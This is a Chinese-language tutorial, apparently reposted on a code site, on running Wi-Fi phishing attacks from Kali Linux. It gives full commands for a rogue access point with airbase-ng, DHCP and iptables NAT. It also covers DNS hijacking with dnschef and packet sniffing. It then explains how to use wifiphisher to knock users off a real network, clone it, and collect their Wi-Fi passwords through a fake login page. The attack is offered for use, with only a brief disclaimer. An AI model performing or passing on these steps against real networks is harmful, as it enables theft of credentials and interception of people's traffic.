電子證據 利用Kali進行wifi釣魚實戰詳細教程


電子證據 利用Kali進行wifi釣魚實戰詳細教程

一、 Kali系統安裝和必要軟件安裝:

二、利用kali建立釣魚wifi:

建立熱點

工具:isc-dhcp-server ;Aircrack-ng套件;iptables

isc-dhcp-server上面已裝,其他的kali自帶。

shell輸入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打開文件命令,如沒有這個文件,則創建。 
寫入如下內容: 
authoritative;

default-lease-time 700; 
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 { 
option routers 10.0.0.1; 
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

這里以10.0.0.1作為網關和dns服務器地址。

然后我們處理無線網卡

ifconfig wlan1 down #wlan1是你的網卡 這里意思是關閉wlan1網卡 
iwconfig wlan1 mode monitor #設置wlan1網卡為監聽模式 
ifconfig wlan1 up #打開wlan1網卡 
airmon-ng start wlan1 #啟動wlan1網卡的監聽模式 

上述命令可以防止出現:Error: Got channel -1, expected a value > 0.

然后用airbase建立熱點 
airbase-ng -e Fishing -c 11 wlan1 #創建名為Fishing的熱點,Fishing 自己改。 

熱點的網絡流量會被虛擬到at0這塊網卡上面 

ifconfig at0 up #啟用at0這塊網卡 
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩碼 
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由 
echo 1 > /proc/sys/net/ipv4/ip_forward #打開ip轉發 

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 
service isc-dhcp-server start #開啟 dhcp

然后可以試着用手機連接,應該可以連上但上不了網

於是配置NAT 
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #對eth0進行源nat 
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把無線網卡流量轉發到有線網卡(或者什么能上網的網卡)上面 
iptables -A FORWARD -p tcp –(兩個-)syn -s 10.0.0.0/24 -j TCPMSS –(兩個-)set-mss 1356 #修改最大報文段長度

注意那第三個命令調整MSS,不加后果很嚴重(我就一直死在這里)

(這里可能還是DNS錯誤,請看后文中的dns代理服務器搭建)

劫持DNS

工具:dnschef

過程:

dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,對於所有請求轉發到61.128.128.68進行解析。 

然后就可以用wireshark等工具抓包啦!

三、wifiphisher:

(要買一個無線網卡,淘寶23元一個,團購免郵費) 

這是一個wifi攻擊腳本,詳細介紹地址:https://github.com/sophron/wifiphisher

先,我們來下載wifiphisher: 

在shell框里輸入命令: 
git clone https://github.com/sophron/wifiphisher.git

等待下載完畢,然后你可以在你下載的目錄下看見wifiphisher這個文件夾。然后在這個文件夾運行 shell.

輸入命令:python bin/wifiphisher 
如果是第一次運行腳本的話,它可能會出現提示安裝hostpad的信息,鍵入Y繼續安裝即可。 

完成的時候,再次運行Wifiphisher腳本。

這次將運行8080和433端口的Web服務器,然后開始搜索附近的Wi-Fi網絡。 

等待搜索完成,我們會發現一系列Wi-Fi網絡名。 

然后按Ctrl+C 選擇攻擊的wifi

出現1、2、3三種模式,這三種模式代表發送不同的驗證頁面給連接的用戶,具體的頁面文件在wifiphisher目錄下的 attack page中。也可以自己寫一個。 

敲下回車,Wifiphisher會顯示正在使用的界面,還有正被攻擊及復制的AP所在的SSID。

然后已連接件被攻擊wifi的用戶會被強制斷開,wifiphisher會copy這個被攻擊的wifi,做一個偽裝wifi(原理就如第二步),然后斷開的用戶將會再搜索到的是這個偽裝wifi,當他們連接這個wifi時會接受到一個驗證頁面(3種模式有3種不同的頁面),然后會要求用戶輸入密碼,當用戶輸入密碼提交后,你將會看見這個密碼。 

如果他們連上這個偽裝wifi,你就可以用wireshark等工具進行抓包啦~~!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM